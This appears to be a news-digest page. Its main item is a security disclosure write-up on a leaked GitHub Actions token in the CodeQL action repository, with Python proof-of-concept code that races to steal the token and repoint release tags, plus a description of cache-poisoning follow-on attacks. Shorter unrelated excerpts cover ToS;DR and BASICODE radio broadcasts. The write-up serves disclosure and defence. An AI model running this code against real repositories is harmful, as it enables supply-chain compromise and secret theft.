After running the Actions Artifact Secrets Scanner for a day, it picked up a token in a github/codeql-action repository artifact published by this run. The Actions Artifact Secrets Scanner downloaded the “my-debug-artifacts” zip uploaded by the “PR Check — Debug artifacts after failure” workflow, recursively extracted the “my-db-java-partial.zip” file stored inside, and ran Nosey Parker. Within seconds, Nosey Parker flagged a GitHub Token starting with “ghs_” in a crash report.
Investigating manually, I confirmed this was a GitHub App installation token stored in a file containing the environment variables of the GitHub runner executing the workflow.
Secrets compromise is cool, but what can we do with this token? The impact of a compromised GITHUB_TOKEN is minimal if it only has read permissions.
The easiest way to determine the privileges of a GITHUB_TOKEN is to look at workflow logs. To investigate this, I navigated to the “Setup Job” step of the workflow that uploaded the token.
We could spend a lot of time talking about each privilege, but let’s focus on the ones that are particularly interesting.
Contents: write — Allows the token to create branches, create tags, and upload release artifacts.
Actions: write — Allows you to work with Actions, including trigger workflow_dispatch events.
Packages: write — Allows the token to upload packages.
With these privileges, an attacker has a lot of potential for repository tampering, but there is still one issue. These tokens are only valid for the duration of their specific workflow job. That means that once the job is over, the token is useless. Three things needed to happen for an attacker to be able to abuse this token:
1. The token needs to have some sort of write privileges (already confirmed).
2. The token needs to use v4 of the upload-artifact API, as that is the only version that allows you to retrieve an artifact before the job is complete (and after the job is complete, the token is invalid).
3. The time between uploading the artifact and completing the job needs to be long enough for us to download, extract, and use the token.
If all of these conditions are met, this publicly exposed token could be used to launch a full scale supply chain attack on CodeQL. This was like finding out that the security guard was accidentally leaving their master key in plain sight for a brief moment, over and over again.
We had to determine if the guard left us enough time to steal the key and use it before they returned to their post.
Identifying the artifact upload version is typically straightforward. If a workflow uses actions/upload-artifact@v4, we can retrieve the artifact before job completion. If it uses an earlier version, we cannot do so.
In this case, CodeQL wasn’t using the actions/upload-artifact action; they were manually using the upload artifact client in the source code. Code comments indicated it used version 4. That was enough for me to continue.
Now we needed to determine if the job lasted long enough for us to retrieve and use the token.
Looking at the raw GitHub logs for this workflow, we can see two key timestamps:
The artifact finished uploading at 17:22:09:889.
The final step in the job, “Cleaning up orphan processes”, happened at 17:22:10:911.
That means we had approximately 1.022 seconds to download the artifact, extract the GitHub token, and use it. I noticed the token stayed valid for about a second after the “Cleaning up orphan processes” step, so we’ll call it two seconds.
The guard was giving us two seconds to steal the key and use it before they returned.
Is that enough time for an attacker to use this token? Or is this another theoretical vulnerability?
To test this, I made a Python script, artifact_racer.py, which performs the following actions:
1. Continuously queries the github/codeql-action GitHub repository until it sees a “PR Check — Debug artifacts after failure” workflow begin.
2. Once it sees such a workflow run, downloads the artifact and extracts the GITHUB_TOKEN. (Shelling out for file operations and downloads was key to increasing the speed, although there are probably ways to make it even faster.)
3. Uses the GITHUB_TOKEN to make a new branch.
4. Uses the GITHUB_TOKEN to push an empty file named poc.txt to that branch.
5. Makes a new tag for that commit.
If I could make a new branch, add a file, and create a tag for that commit, that would prove an attacker could use the token for nefarious purposes before it expired.
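Here is a simplified sketch of that race. It is not the published artifact_racer.py (the real tool shelled out for speed); the REST endpoints are GitHub’s documented API, but the polling logic, token regex, and branch and tag names are illustrative.

```python
import base64
import io
import re
import time
import zipfile

import requests

API = "https://api.github.com"
REPO = "github/codeql-action"
WORKFLOW = "Debug artifacts after failure"

# The attacker's own PAT: artifact downloads require *some* authenticated
# user, even on public repositories.
sess = requests.Session()
sess.headers.update({"Authorization": "Bearer <attacker-pat>",
                     "Accept": "application/vnd.github+json"})

def wait_for_run() -> dict:
    """Poll until the target workflow has a run in progress."""
    while True:
        runs = sess.get(f"{API}/repos/{REPO}/actions/runs",
                        params={"status": "in_progress", "per_page": 50}).json()
        for run in runs.get("workflow_runs", []):
            if WORKFLOW in run["name"]:
                return run
        time.sleep(2)

def find_token(data: bytes) -> str | None:
    """Recursively search zip contents for a ghs_ token (approximate pattern)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            member = zf.read(name)
            if name.endswith(".zip"):
                tok = find_token(member)
                if tok:
                    return tok
            else:
                m = re.search(rb"ghs_[A-Za-z0-9]{36}", member)
                if m:
                    return m.group().decode()
    return None

def race(run: dict) -> None:
    """Grab the artifact the instant it appears, then branch/commit/tag."""
    while True:
        arts = sess.get(run["artifacts_url"]).json().get("artifacts", [])
        if arts:
            token = find_token(sess.get(arts[0]["archive_download_url"]).content)
            break
    h = {"Authorization": f"Bearer {token}", "Accept": "application/vnd.github+json"}
    # Assumes the repo's default branch is `main`.
    sha = requests.get(f"{API}/repos/{REPO}/git/ref/heads/main",
                       headers=h).json()["object"]["sha"]
    requests.post(f"{API}/repos/{REPO}/git/refs", headers=h,
                  json={"ref": "refs/heads/poc-branch", "sha": sha})      # new branch
    r = requests.put(f"{API}/repos/{REPO}/contents/poc.txt", headers=h,
                     json={"message": "poc", "branch": "poc-branch",
                           "content": base64.b64encode(b"").decode()})    # empty poc.txt
    requests.post(f"{API}/repos/{REPO}/git/refs", headers=h,
                  json={"ref": "refs/tags/poc-tag",
                        "sha": r.json()["commit"]["sha"]})                # tag the commit

race(wait_for_run())
```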
Given that the workflow artifact was only ~21 MB, I thought we had a chance. After successfully executing against a test repository, I moved on to the github/codeql-action repository.
About two hours later, a “PR Check — Debug artifacts after failure” workflow executed. The racer successfully retrieved the GITHUB_TOKEN, created the branch, pushed the file, and added the tag.
The ability to create a tag becomes very important in this attack. Keep that in mind as we go.
After confirming the GITHUB_TOKEN could be used within the short time window, we responsibly disclosed this vulnerability to GitHub.
Using the GITHUB_TOKEN, an attacker could add malicious code to any unprotected branch. A covert tactic would be to target feature branches pre-merge, smuggle in a small malicious code change, and wait for it to get merged. This would be especially effective due to how frequently the GitHub Actions bot commits to the CodeQL Actions repository.
They could also add tags that point to specific commits. For example, if they had malicious code on a branch and then added a v3 tag, anyone who manually used codeql-action…@v3 would execute the malicious code. More on this later.
Through code execution, you’d be able to compromise any GitHub Actions secret used within that job, as well as exfiltrate the source code of that repository. If the victim’s actions were executing on internal infrastructure, which is common with self-hosted GitHub runners, you’d also have code execution on their internal network or cloud environment.
The impact from this attack would have been very similar to the recent tj-actions/changed-files supply chain attack.
This impact is impressive, but it doesn’t quite live up to the claims I made in the beginning. Yes, through these paths, they could launch a supply chain attack against repos manually using the CodeQL actions. However, most organizations don’t include these actions manually. They just go into their repository settings, click “Enable CodeQL”, and go from there.
At first, I assumed that enabling CodeQL in your repository didn’t interact with the github/codeql-action repository at all.
After discussing this issue with some colleagues, I decided to investigate further. What actually happens when you enable CodeQL?
This section is key to understanding the full impact of this vulnerability. Stick with me.
To investigate, I created my own public repository, “John’s Top Secret Repo”, and enabled CodeQL.
After you enable CodeQL with the default settings, a special GitHub Actions workflow runs in your repository. This CodeQL action won’t show up in your repository workflows, but you can navigate to the workflow logs to see what it is doing.
Checks out your repository to the filesystem
Let’s take a closer look at step 3.
If this doesn’t shock you, look again. Remember that we have the ability to push tags to the github/codeql-action repository.
CodeQL, under the hood, is executing the actions in the github/codeql-action repository, using the commit referenced by the v3 tag. This tag was not immutable, and they were not using workflow pinning (which GitHub recommends), which meant that an attacker could overwrite the v3 tag using the compromised GITHUB_TOKEN. Now, if an attacker removed and then added a v3 tag to their malicious commit, every single repository using the default CodeQL workflow would execute their malicious code.
The Action created when selecting “Advanced CodeQL” also used the reusable github/codeql-action with the v3 tag.
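Concretely, repointing a mutable tag takes only two documented Git-refs API calls. The sketch below is hypothetical: it assumes a stolen token with contents: write privileges and an attacker-controlled commit SHA.

```python
import requests

API = "https://api.github.com"
REPO = "github/codeql-action"

def repoint_tag(token: str, tag: str, malicious_sha: str) -> None:
    """Delete a tag ref and recreate it pointing at an attacker-chosen commit."""
    h = {"Authorization": f"Bearer {token}", "Accept": "application/vnd.github+json"}
    # Delete the existing tag ref...
    requests.delete(f"{API}/repos/{REPO}/git/refs/tags/{tag}", headers=h)
    # ...and recreate it at the malicious commit. Every default CodeQL workflow
    # resolving the v3 tag would now check out this commit.
    requests.post(f"{API}/repos/{REPO}/git/refs", headers=h,
                  json={"ref": f"refs/tags/{tag}", "sha": malicious_sha})

# repoint_tag(stolen_token, "v3", "<malicious commit sha>")
```

This is also why pinning to a full commit SHA rather than a mutable tag (the workflow pinning GitHub recommends) matters: a SHA cannot be silently repointed the way a tag can.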
The CodeQL actions check out the source code of every repository they run on, which means that a malicious CodeQL action could exfiltrate the source code of any repository using default CodeQL configurations.
This would result in significant disclosure of intellectual property. And if you’ve ever operated on a Red Team, you know how many hardcoded secrets are lying around in private source code repositories.
We’re almost done. But remember, I promised one more thing:
4. Compromise GitHub Actions secrets of any workflow using the GitHub Actions Cache within a repo that uses CodeQL
When assessing the impact of CI/CD attack paths, I look for ways to compromise GitHub Actions secrets. Usually, those secrets are where the crown jewels live.
If the CodeQL action is executing with write privileges or alongside GitHub Actions secrets, then it’s trivial to use the code execution to exfiltrate those secrets. But the default CodeQL action uses a GITHUB_TOKEN that only has read privileges, so you can’t perform repository write operations, backdoor releases, or use fancy workflow dispatch events to steal secrets, like what happened with PyTorch.
What the default CodeQL action does do is execute in the main branch of the repository. The main branch of any GitHub repository can write cache entries that will be used by the entire repo. This opens up an opportunity to conduct GitHub Actions cache poisoning.
GitHub Actions Cache Poisoning is thoroughly explained in this article by Adnan Khan, which documents the discovery and exploitation of cache poisoning. The easiest way to conduct GitHub Actions cache poisoning is by deploying Cacheract, malware that persists in a build pipeline through cache poisoning.
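To see why main-branch cache writes are so dangerous, consider a typical (hypothetical) consumer of actions/cache. Cache entries written from the default branch are restorable by workflows on other branches, so a poisoned entry written by a compromised main-branch job gets restored, and implicitly trusted, far beyond the branch that wrote it:

```yaml
# Hypothetical workflow step restoring a dependency cache.
- uses: actions/cache@v4
  with:
    path: ~/.npm                                    # restored verbatim onto the runner
    key: npm-${{ hashFiles('package-lock.json') }}  # whoever can write this key from
                                                    # the default branch controls what
                                                    # every other workflow restores
```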
If an attacker deployed Cacheract in the CodeQL workflow, it would:
Gain code execution within any workflow that uses actions/cache (the Actions Cache is used by most repositories)
Leverage code execution to compromise GitHub Actions secrets used by those workflows, capture privileged GITHUB_TOKENs, and more
Even if someone noticed the malicious CodeQL action and remediated the vulnerability, Cacheract would continue poisoning caches.
I spent ten minutes looking for prominent repos that use CodeQL & actions/cache and identified Homebrew, Angular, and Grafana.
Cache poisoning would allow an attacker to leverage this CodeQL supply chain attack to gain write access to repositories and repository secrets.
We’ve now hit all the impact highlights I mentioned at the beginning:
Compromise intellectual property by exfiltrating the source code of all private repositories using CodeQL.
Steal credentials within GitHub Actions secrets of any workflow job using CodeQL, and leverage those secrets to execute further supply chain attacks.
Compromise GitHub Actions secrets of any workflow using the GitHub Actions Cache within a repo that uses CodeQL.
Supply chain attacks like these are scary, especially when they start with something as simple as a publicly exposed credential. If this is your first time hearing about abusing GitHub Actions to launch supply chain attacks, I’ll let you in on a secret: these vulnerabilities occur all the time.
...
Read the original on www.praetorian.com »
Inside a Marine’s decision to eject from a failing F-35B fighter jet and the betrayal in its wake
...
Read the original on www.postandcourier.com »
“I have read and agree to the Terms” is the biggest lie on the web. Together, we can fix that.
A sampling of the points contributors have flagged across different services:
Facebook stores your data whether you have an account or not.
Deleted content is not really deleted.
This service keeps user logs for an undefined period of time.
Third-party cookies are used for advertising.
Terms may be changed any time at their discretion, without notice to the user.
This service tracks you on other websites.
The service can delete your account without prior notice and without a reason.
Voice data is collected and shared with third parties.
The service can delete specific content without prior notice and without a reason.
This service may keep personal data after a request for erasure for business interests or legal obligations.
Tracking via third-party cookies for other purposes without your consent.
Users have a reduced time period to take legal action against the service.
The service may use tracking pixels, web beacons, browser fingerprinting, and/or device fingerprinting on users.
Your data may be processed and stored anywhere in the world.
Instead of asking directly, this service will assume your consent merely from your usage.
You can delete your account and Duck Addresses.
This service provides an onion site accessible over Tor.
The service makes critical changes to its terms without user involvement.
Deleted videos are not really deleted.
This service gathers information about you through third parties.
The service collects many different types of personal data.
They store data on you even if you did not interact with the service.
The copyright license maintained by the service over user data and/or content is broader than necessary.
You can access most of the pages on the service’s website without revealing any personal information.
This service still tracks you even if you opted out from tracking.
This service does not track you.
The service will resist legal requests for user information where reasonably possible.
IP addresses of website visitors are not tracked.
The cookies used by this service do not contain information that would personally identify you.
This service can share your personal information to third parties.
This service forces users into binding arbitration in the case of disputes.
This service shares your personal data with third parties that are not involved in its operation.
Content you post may be edited by the service for any reason.
This service keeps a license on user-generated content even after users close their accounts.
ToS;DR aims to provide easy-to-understand summaries of Privacy Policies and Terms of Service through a transparent and peer-reviewed process.
Terms of service are reviewed by volunteer contributors, who highlight small points that we can discuss, compare and ultimately score as “good”, “neutral”, “bad” or, scariest of all, “blocker”.
Once a service has enough points to assess the fairness of their terms, we use a formula to provide ratings from Grade A to Grade E:
Grade A — The terms of service treat you fairly, respect your rights, and will not abuse your data.
Grade B — The terms of service are fair towards the user but they could be improved.
Grade C — The terms of service are okay but some issues need your consideration.
Grade D — The terms of service are very uneven, or there are some important issues that need your attention.
Grade E — The terms of service raise very serious concerns.
No Grade Yet — Not enough information exists to accurately grade this service yet.
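ToS;DR doesn’t publish the formula in this summary, but its shape is easy to imagine: weigh each classified point, then bucket the aggregate into a letter grade. A toy sketch in Python, with made-up weights, cutoffs and thresholds (the real algorithm differs):

```python
# Toy grading pass: the weights, cutoffs, and minimum-points threshold
# are all invented for illustration -- ToS;DR's real formula differs.
WEIGHTS = {"good": 1.0, "neutral": 0.0, "bad": -1.0, "blocker": -3.0}
CUTOFFS = [(0.5, "A"), (0.2, "B"), (-0.2, "C"), (-0.5, "D")]

def grade(points: list[str]) -> str:
    if len(points) < 5:           # not enough reviewed points yet
        return "No Grade Yet"
    if "blocker" in points:       # a single blocker caps the grade
        return "E"
    score = sum(WEIGHTS[p] for p in points) / len(points)
    for cutoff, letter in CUTOFFS:
        if score >= cutoff:
            return letter
    return "E"

print(grade(["good", "neutral", "bad", "bad", "bad", "bad"]))  # -> "D"
```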
Right now you will notice that many services do not yet have a grade assigned. This is where you come in! Help us analyse more documents so that we may increase our coverage.
...
Read the original on tosdr.org »
So there I was, minding my own business, doom-scrolling my way through Facebook posts when I happened upon one that hit me straight in the nostalgia. A photo of a 1980s home computer, a cassette player and some tapes. The text underneath proclaimed “In the 1980s, people could download video games from radio broadcasts by recording the audio onto cassette tapes. These tapes could then be played on computers to load the games”. I nodded sagely to myself as I remembered doing just that.
Then I started to read the comments underneath, and people were flat-out denying that this had ever happened. The reply guys broadly fell into two camps: the “I have never heard of this, therefore it never happened” crowd, and the overconfident “experts” saying things like “this would be technically impossible due to some fancy-sounding words I’ve heard, like ‘hertz’, ‘compression’ and ‘frequency shift keying’, therefore it never happened”.
Just to make sure I was in a spluttering rage, the page itself was titled “Unbelievable facts”, as if my own childhood had become unbelievable. Although, now I think about it, it was an unbelievably long time ago, so maybe they have a point.
Anyway, come back with me to the UK in the early 1980s. Recession, strikes, unemployment and the first female Prime Minister, Margaret Thatcher, dominated the news. The home video cassette recorder was only just becoming common, the compact disc wouldn’t be launched until the middle of the decade and mobile phone networks didn’t even exist. Dexy’s Midnight Runners, Irene Cara and Culture Club soundtracked the era and, across the land, the home computer boom was booming.
Computers were new, barely making their way even into the workplace. Most people in office jobs were using typewriters, carbon paper and the postal system. But the microprocessor revolution promised to make computer skills essential to the economy, and so the British Broadcasting Corporation began a public education exercise: the BBC Computer Literacy Project.
The BBC’s project is best remembered for the TV programmes fronted by Ian McNaught-Davis and Chris Serle and, of course, the eponymous BBC Micro, specially developed by Acorn to accompany the programmes. Less well known was a Radio 4 series called The Chip Shop. According to the ever-reliable internet, it was presented by Barry Norman (much better known as a film critic than a technology expert), although I have no recollection of that.
Home computers at the time were a marvel of cost-efficient engineering. Usually a chunky wedge-shaped keyboard with all the gadgetry inside, the machine used your normal home TV as a display and an ordinary portable cassette recorder as a data storage device. Software (which for most of us meant games) would be supplied on an audio cassette on which a series of piercing screeching noises were recorded. You’d hook up the cassette player to your computer, play the screeching noises into it through a cable of some description, and after a few minutes your game would be loaded up and ready to play. Or, more often, you’d hear several minutes of screeching before the process died with a cryptic message like “R Tape loading error” and you’d have to start again.
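Those screeching noises were, in effect, a modem signal on tape: each bit encoded as a burst of audio tone, the “frequency shift keying” the Facebook experts invoked and then wrongly dismissed. A minimal sketch in Python of a Kansas City-style encoder, assuming the classic 300-baud scheme of 1200 Hz for a 0 and 2400 Hz for a 1 (individual machines used their own variants):

```python
# Encode bytes as Kansas City-style FSK audio: 300 baud, 1200 Hz = 0 bit,
# 2400 Hz = 1 bit; one start bit, eight data bits (LSB first), two stop bits.
import math, struct, wave

RATE, BAUD = 44100, 300
F0, F1 = 1200, 2400  # Hz for a 0 bit and a 1 bit

def tone(freq: int) -> list[float]:
    """One bit period of sine wave at the given frequency."""
    n = RATE // BAUD
    return [math.sin(2 * math.pi * freq * i / RATE) for i in range(n)]

def encode(data: bytes) -> list[float]:
    samples = []
    for byte in data:
        bits = [0] + [(byte >> i) & 1 for i in range(8)] + [1, 1]
        for bit in bits:
            samples += tone(F1 if bit else F0)
    return samples

with wave.open("takeaway.wav", "w") as w:
    w.setnchannels(1); w.setsampwidth(2); w.setframerate(RATE)
    w.writeframes(b"".join(struct.pack("<h", int(s * 32767))
                           for s in encode(b'10 PRINT "HELLO"')))
```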
There were many different companies making these computers, all competing for the nascent home market. And, with a few notable exceptions, they were all incompatible with each other: the screeching noises on a cassette for, say, your ZX Spectrum would be of no use to the kid next door who had a Commodore 64. This presented a problem for Barry and his Chip Shop. The BBC wanted to broadcast software as part of the radio programme, but they’d have to play a different set of screeching noises for each type of computer, and their regular listeners would be subjected to twenty minutes of screeching at a time.
The solution lay over the water in The Netherlands. The Dutch public broadcaster NOS had encountered the same problem and had developed a system called BASICODE. Often described as a kind of “Computer Esperanto”, it allowed the same software to run on different types of computer. You would order a cassette that had BASICODE interpreters for different machines, load up the one that matched your device and then that interpreter would load up the BASICODE program you’d recorded off your radio.
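The trick was a fixed contract: BASICODE programs stuck to a common subset of BASIC and reached the machine only through an agreed set of numbered subroutines that each platform’s interpreter supplied. As a loose modern analogy in Python (the routine numbers and behaviours here are invented for illustration, not the real BASICODE assignments):

```python
# Loose analogy for BASICODE: one portable program, per-machine routine
# tables. Routine numbers and behaviours are invented for illustration.
SPECTRUM = {100: lambda: print("\033[2J"),      # clear screen (ANSI stand-in)
            110: lambda s: print(s)}            # print a line
C64      = {100: lambda: print("\n" * 25),      # clear screen, another way
            110: lambda s: print(s.upper())}    # this machine shouts

def run(program, machine):
    """Interpret a portable program against one machine's routine table."""
    for routine, *args in program:
        machine[routine](*args)

PROGRAM = [(100,), (110, "Hello from the Chip Shop Takeaway")]
run(PROGRAM, SPECTRUM)  # same program...
run(PROGRAM, C64)       # ...different machine
```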
The BBC extended this system as BASICODE 2 (and later 2+) to include more functionality and support more brands of computer. And so was born The Chip Shop Takeaway. Late at night, when anyone with any sense was asleep and not listening to their radio, the BBC would broadcast BASICODE programs for home computer enthusiasts to record and use on their machines. To call these “video games” would be a bit of a stretch, as BASICODE didn’t really support any kind of graphics, but I certainly remember some very basic text-based games amongst a load of academic software that meant absolutely nothing to me as an eight-year-old boy.
Nothing lasts forever, though. The mass of competing computer systems became an unsustainable boom market. Manufacturers went broke, the range declined, technology moved on, and the boom became a bust. Newer 16-bit machines eschewed cassette storage for new-fangled disk drives, and the screeching of a BASICODE takeaway became a forgotten sound on Britain’s radio waves. According to Wikipedia, BASICODE 3 was also developed and continued to be popular in the old East Germany up until the early 1990s, but for those of us in the UK it had already moved into the realm of “unbelievable facts”.
...
Read the original on newslttrs.com »